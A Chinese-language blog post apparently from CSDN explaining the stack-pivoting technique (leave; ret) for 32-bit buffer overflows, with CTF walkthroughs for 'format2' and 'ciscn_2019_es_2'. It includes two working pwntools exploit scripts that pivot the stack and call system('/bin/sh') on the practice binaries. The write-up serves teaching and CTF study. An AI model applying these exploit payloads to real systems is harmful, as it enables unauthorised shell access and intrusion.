栈迁移(leave ret)(更适合pwn宝宝体质的栈迁移~)

最新推荐文章于 2024-09-09 21:21:44 发布
最新推荐文章于 2024-09-09 21:21:44 发布
阅读量2.1k 收藏 21
点赞数 6
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kata_Jhin/article/details/130678623
版权
文章详细介绍了栈溢出中的栈迁移技术,特别是32位环境下的leaveret命令在函数调用恢复过程中的作用。通过函数调用机制、程序示例和具体指令分析,阐述了如何利用leaveret恢复栈空间并进行栈迁移。此外,还提供了两个具体的题目例子来说明如何在实际场景中应用这些知识进行漏洞利用。
摘要由CSDN通过智能技术生成

前言

栈迁移同属于栈溢出的一种技巧

由于32与64的调用基本是类似的,在理解32位后64位的利用较为简单,利用流程主要是多了个对csu_init函数的使用(不知道这是啥的自行学习ret2csu,检验而至这个函数可以实现前三个函数调用寄存器的内容控制),所以以下主要基于32位小端序进行讲解

其原因主要来自c的函数调用机制的一些特点。

因为栈迁移和函数调用这难以分割的关系,栈溢出的根本原理也基于此,所以我在这里简要讲解以下c语言的函数调用过程。重点在于leave ret,这两条汇编命令

考虑到一些因素,这里对leave,ret两条命令简述:

leave由几个gadget(代码片段)组成

分别是 mov esp,ebp pop ebp

ret即 pop rip

目录

前言

函数调用过程

程序举例

栈迁移利用原理讲解:

题目举例:

1.攻防世界 format2

canary的识别

payload:

2.buuctf ciscn_2019_es_2

payload:

另外你可能会想

函数调用过程

在一个可执行文件中,基本上都会存在main函数以下的子函数被调用的情况(main函数本身也是一个调用),而一个文件的运行,需要调用到一段内存空间,其中的一部分也即栈空间。倘若程序使用栈空间,不恢复,一直往低地址不断的生长,那当函数调用次数一多,栈空间会变得非常大才能满足程序运行的要求,这当然是不合理的。所以函数在使用了栈空间后,需要对栈空间进行恢复。

程序在调用子函数后会将esp指针的指向像上增长所需数量,作为子函数的堆栈使用空间,而ebp栈底保存了父函数的栈底,ebp再往下就是调用函数正常的返回地址

需要知道的是,esp,ebp实际上都是存的地址,图示ebp的位置存的是复函数栈底的地址,最顶上那个数据也不是esp的数据,esp寄存器此时存的数据是栈顶此时的绝对地址,因此指向的了栈顶(和c的指针类似),此图主要是为了演示各关键数据的相对位置。

ebp我们在basic rop(基础栈溢出)中常常是不考虑他该放什么的,主要是将retadd部分覆盖为有效数据。

但在栈迁移中,ebp位置所放的就是关键。

前面讲到,leave ret 是恢复栈的关键,留心你也可以ida每一个子函数的末尾看见它,那么它对应的gadget在程序执行流中具体是怎样实现恢复堆栈的呢,下面通过示意图的方式讲解。

这是我们假设的某个程序执行状态的切片,子函数已经调用完毕,已经准备执行leave ret了

mov esp,ebp

前面讲到,ebp,esp实际上都是存的地址,因此将ebp中的地址数据赋到esp中就可以让esp此时也指向这个地方

pop ebp

esp指向的数据弹入ebp,ebp中存的数据改变,因而指向了父函数的栈底,又由于pop指令除了弹出数据外还会将esp的指向下移,所以esp此时指向了函数的正常返回地址

ret (pop eip)

eip即程序执行时实时运行的代码的指向寄存器,esp再下移一位,栈空间是连续向上生长的,至此,子函数调用结束。

程序举例

以上描述可能会比较抽象,这里以一个简单程序为实例:

程序功能很简单,主要是起到一个栈空间的演示

几根红线分别标注的是ebp,esp,eip此时存储的内容,可以发现都是地址,绿色箭头表示当前程序的执行流,此时正准备调用test函数,记住此时 ebp的内容是0xffffce68

程序通过leave ret 的一个逆过程,使ebx的父栈底地址存入子栈底,并将ebp指向这个新的地址,

可以发现如前面所说,ebp中的内容变为了新栈底的地址,但此栈地址存储的内容正是我先前强调的0xffffce68

子函数执行过程略

可以看到子函数调用完毕,准备返回

在执行完leave后,ebp重新指向父函数的调用地址0xffffce68,esp下移,指向main+57(57是对于main函数的相对偏移,表示的是main函数中代码段的的一个地址,此处就是main函数中调用完test后该返回的地址)

子函数调用完毕,父函数栈空间恢复完毕

相信到这里看师傅应该大致了解了leave ret具体是什么了,那么我们该怎样利用呢?

栈迁移利用原理讲解:

这里假设一个情况,有一个一个main的栈空间此时我们只能溢出恰好把返回地址覆盖掉,假如我们要执行system(“/bin/sh”)就会出现无法打入参数的情况(毕竟要在ret后还加入调用函数的参数)

这里就需要操控esp的指向

当只有一个leave ret时,可以发现只有ebp在执行后会跳到我们我们写入的ebp,esp在执行完ret后只会到ret地址指向的下一个位置

那我们要在retadd的位置也写上leave ret呢?可以自己先在纸上或者什么上自己画画栈空间想想会发生什么

那么leave后esp就可以指向我们能控制的那个ebp往下一个位置, 而ret就会把他当做返回地址弹入eip

这样有什么用处呢?

最基本的,假如我们把ebp指向指回我们输入的数据的上端,那么就可以绕开rbp后面才是ret的这个限制,可以在上面就编写编写返回地址,构造参数之类的

题目举例:

(因为并不是wp,所以就不按照格式写了)

1.攻防世界 format2

可以发现有canary

ida:

(ctrl f 找一下main)

可以发现是这么依托,但是实际上并没有canary

canary的识别

为什么这么说,因为在当前函数调用并没有一个多的没用使用却又被申请的变量,比如下面这个,它在栈空间对应

在汇编中它出现了,在stack check之前调用来验证,所以也就是那个canary

decode那个函数就是把解码后的东西放进v5,返回解码后的长度

所以也就是进行了base64解码,如果解码后的长度大于12,就不能通过,也就是我们的payload的解码结果不能超过12个字节

可能会有师傅看到base64的解码比较不解,实际上不影响,实际上也就是我们发送的数据比之前的多了个加密的步骤。

另外留意一些input实际上是存bss段里的,可以全局调用

往后看,后面的else是执行了一次拷贝,(v5放v 7个长度的到input中)

然后调用了auth

溢出点就在这里

correct里是这样

可能会有一个问题,我们不是只能覆盖到ebp吗为什么可以栈迁移

因为我们在auth函数中,每一个函数调用完了都会有leave ret,而这里执行完了auth的返回值已经被固定了,所以不可能触发correct

所以完了直接就是main的 leave ret,自然也就凑齐了两个leave ret

那前面那八个字节会不会小了点呢,足够了

我们前面说过一个结论,当两个lr执行后 ,ip会指向写入rbp处地址往后的第一个帧(每4字节一帧(32bit))上的地址,因为有完整的getshell代码段,所以实际上就是最基本的ret2text(往栈里面放sh参数,然后调用)

因为我们输入的payload解码后是放input,所以我们写input的地址

所以逻辑上来说,这道题我们就是把“栈“”迁移到了bss上

payload:

import base64
from pwn import *
#p=remote('61.147.171.105',55599)
#p=process("./9eb304f8cf4641339ef4fd4b0f204b86")
p=gdb.debug('./9eb304f8cf4641339ef4fd4b0f204b86')
sys_addr=0x08049284			  #text段
input_addr=0x0811EB40
payload=b'aaaa'+p32(sys_addr)+p32(input_addr)
p.sendline(base64.b64encode(payload))
p.interactive()

2.buuctf ciscn_2019_es_2

直接调用vul(函数)

此题没有现成的代码段,但是有system

这个sys是echoflag,并不会回弹flag给你,只会打印一个“flag”,所以我们用这个函数就行了

这个vul函数会执行两次读入,两次都刚好溢出至ret

而s又足够大,所以部署一个完整的system sh的调用栈空间就行了

栈空间如下

但是呢,这里还有一个问题,虽然这题没有pie,但是实际上每次函数调用的栈地址肯定是有差别的,我们需要泄露栈的地址

这里的第一个输入为我们提供了便利,%s是遇到/x00结束,read会自动存分隔符,但当把空间打满他就存不了了,打印就会继续往下,我们只需要截取rbp那一部分即可,所以打印到那也无所谓

用gdb调一下算出第二个read时与泄露地址的距离

发现是

rbp:0xff9a76d8

read:oxff9a76a0

所以偏移就是6db-6a0=0x38

sh字符串的存储位置:在前面正好是0x10,所以就是0x28

payload:

from pwn import*
  
#a=remote("node3.buuoj.cn",)
p=process("ciscn_2019_es_2")
#context(arch='i386',os='linux',log_level='debug')
p=gdb.debug('./ciscn_2019_es_2')
elf=ELF('./ciscn_2019_es_2')
sys=elf.symbols['system']
leave_ret=0x08048562		
p.recvuntil("Welcome, my friend. What's your name?")
payload=b'a'*0x20+b'b'*8#b作为标识符
p.send(payload)
p.recvuntil("bbbbbbbb")
ebp=u32(p.recv(4))
payload2=b'a'*4+p32(sys)+p32(0xaa)+p32(ebp-0x28)+b"/bin/sh"
payload2=payload2.ljust(0x28,b'\x00')#因为前面的数据并不是直接对齐,所以用ljust把后面填满
payload2+=p32(ebp-0x38)+p32(leave_ret)
p.send(payload2)
 
p.interactive()

另外你可能会想

这题不是也在子函数里面,不也直接返回main然后接lr吗

虽然的确是回到main,但由于ecx保存了之前的ebp所以在main退出时就发生了截断,因此如果不带一个lr没有办法getshell

ida:

gdb:

Kata_Jhin
关注
pwn --迁移
zszcr的博客
04-07 7099
迁移主要是为了解决溢出可以溢出空间大小不足的问题迁移的实现:通过将ebp覆盖成我们构造的fake_ebp ,然后利用leave_ret这个gadget将esp劫持到fake_ebp的地址上leave_ret相当于:mov %ebp,%esp pop %ebp pop %eip接下来拿HITCON-Training-master 的 lab6做例子题目链接:https://github.com...
pwn--迁移
weixin_44642009的博客
04-17 1023
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问题以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解题关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
pwn刷题num43---迁移
tbsqigongzi的博客
05-03 727
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
迁移(详解)
最新发布
yufeiyu66的博客
09-09 534
迁移主要利用了leave_ret这个指令在函数的先执行到leave指令时,会将ebp处填充的地址pop到ebp中去,这样基地址发生了变化,在下次的位置就会发生变化有个图对这些指令变化阐述的比较清楚来自。
PWN——迁移
L2329794714的博客
08-29 1635
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
pwn入门之迁移
wangxunyu6的博客
03-08 1663
迁移可以用于处理溢出的情况。当溢出且可溢出长度不足以容纳 payload 时,可以通过迁移来构建一个新的空间以放下 payload。
ctf pwn 题目
m0_64195960的博客
04-11 1532
2022年3月21迁移 这道题是迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
pwn-迁移-ROP
leeham的博客
08-23 4201
# 迁移-ROP 题目描述 这里给出题目链接 https://github.com/LeeHaming/CTF-learn/blob/master/easyR0p/easyR0p 程序的结构很简单,main()函数中有一个while(1)的循环,循环中rop()函数执行。 rop()中有明显的溢出,最开始给s申请的内存空间为:0x40;然而read()可以读入0x50字节。 于是就...
Linux PWN技巧之迁移
小小鱼的博客
02-16 1896
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
迁移图解
qq_40410406的博客
11-11 1568
迁移 场景 1 如果程序的保护措施canary开启,会在prev ebp空间的下一个低地址存放一个随机值,当我们溢出时会将这个随机值覆盖,程序检测到这个随机值发生变化以后会自动退出(崩溃),此时就无法进行溢出攻击,所以需要另寻出路。 2 溢出长度不足以使用直接 ROP 3 溢出 payload 会出现空字符截断,且gadget地址含有空字符 4 在泄露地址信息后需要新的 ROP payload 5 如果开启了不可执行保护,就需要迁移到bss段或者data段或者其他位置执行我们的gadge
迁移/劫持
chennbnbnb的博客
01-30 1033
例子 https://github.com/scwuaptx/HITCON-Training/tree/master/LAB/lab6 #include <stdio.h> #include <stdlib.h> #include <unistd.h> int count = 1337 ; int main(){ if(count != 13...
BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1065
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[PWN]——迁移及部分基础
ysy___ysy的博客
04-18 1491
由高到低,自顶向下增长,ebp指向底 【减(push)即指针向高移,加(pop)即指针向低移】。溢出能使我们覆盖上某些区域的值,甚至是当前函数的返回地址 ret;一旦 ret 覆盖为某个奇怪的值,例如 0xdeadbeaf,当函数结束恢复现场,即 eip 指向 ret 时,程序将会跳转到内存中的 0xdeadbeaf 处。此时,内核会立即告诉我们“SIGSEV”,即常见的段错误(Segment Fault)。注意:函数传参时从右往左。
迁移
weixin_44932880的博客
10-13 654
leave ret 原理 一次leave 将 rsp指向 原rbp+8 , rbp指向原rbp 的内容, move rsp rbp (rbp的地址赋值给rsp的地址,即rsp指向rbp) pop rbp (rbp指向rsp的内容(rbp的内容),rsp+=8) 一次ret rip指向原rsp的内容,rsp+=8 pop rip 一次leave ret 使rbp指向原rbp的内容,rsp指向 原rbp+16,rip指向原rbp+8 两次leave ret
pwn】 关于迁移
wintersun的地带
05-19 3242
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
pwn迁移总结
weixin_66751120的博客
01-28 2644
迁移往往在发生溢出的函数能够溢出的只有rbp与返回地址时进行,由于不能输入多数据来构造rop链,一般会把迁往两个位置,一是原来的,二是bss段。在了解迁移之前需要先了解两个汇编指令,这是进行迁移的关键,leave,ret,这两个一般在函数的最后都会出现,可以清空中内容。leave可以理解为mov rsp,rbp;pop rbp这两个汇编指令的效果综合,但只是效果几乎一样,但并不是真的由它俩组成,第一步就是把rbp的值赋给rsp,也就是在同一位置了;
[迁移][BUUCTF][PWN] ciscn_2019_es_2
m0_50819561的博客
09-25 428
前置知识: 迁移概念:当存在溢出且可溢出长度不足以容纳 payload 时,可采用迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip 。因为原来的空间不足,所以要构建一个新的空间放下 payload ,因此称为迁移迁移原理:执行命令是从esp指向的位置想ebp指向的位置执行。正常情况退的操作是:esp指向ebp指向位置,ebp指向ebp里的内容所指向的位置。当遇见leave|ret命令的时候,相当于执行mov esp ebp; pop ebp; ret;作用就是将ebp指向的位置给
[Black Watch 入群题]PWN迁移
wuyvle的博客
02-22 222
进去康康函数结构 第二个read函数可以溢出但是可以构造的rop链很短 0x20-0x18 不过可以用第一个read构造ROP链,且刚好在bss段中,之后迁移到该地址执行,后面就是常规的泄露libc来getshell 迁移 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 这些操作是用来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后.
ctfshow PWN 溢出
08-23
PWN是一种以攻破计算机系统中的漏洞为目的的竞赛类型,参赛者需要利用漏洞进行攻击并获取系统权限。在ctfshow PWN中,溢出是一种常见的攻击方式。 根据提供的引用,我了解到溢出是一种通过向程序输入过长的数据导致数据溢出的一种攻击手段。是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等信息。当程序接收到超出空间大小的数据时,溢出的数据会覆盖到上的其他数据,从而可能改变程序的执行流程。 根据引用,在ctfshow PWN中,参赛者可以利用溢出漏洞来控制程序的执行流程。通过向程序输入特制的数据,可以覆盖控制流中的返回地址,使程序跳转到攻击者精心构造的代码,从而达到获取系统权限的目的。 具体来说,参赛者可以通过向程序发送超出预期的数据,覆盖上的返回地址,使其指向攻击者准备好的恶意代码,从而实现溢出攻击。攻击者可以利用此漏洞来执行任意代码,包括获取系统权限、执行恶意操作等。 引用和引用提供了一些示例代码,演示了如何利用溢出漏洞进行攻击。这些代码使用Python的pwn库来与目标程序进行交互,并通过构造特制的payload来触发溢出漏洞,最终实现控制程序执行流程的目的。 需要注意的是,溢出是一种非常危险的漏洞,合法的程序设计应该避免出现此类问题。在实际应用中,为了防止溢出攻击,开发者需要加强输入验证和数据处理等安全机制。 总结起来,ctfshow PWN溢出是一种通过向程序输入过长数据导致溢出的攻击方式,在该竞赛中常用于获取系统权限和执行恶意操作。攻击者可以利用漏洞覆盖返回地址,使程序执行恶意代码。然而,溢出是一种危险的漏洞,合法的程序设计应该避免此类问题。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [ctfshow pwn4](https://blog.csdn.net/qq_39980610/article/details/126461902)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [ctfshow pwn5](https://blog.csdn.net/qq_39980610/article/details/126462163)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值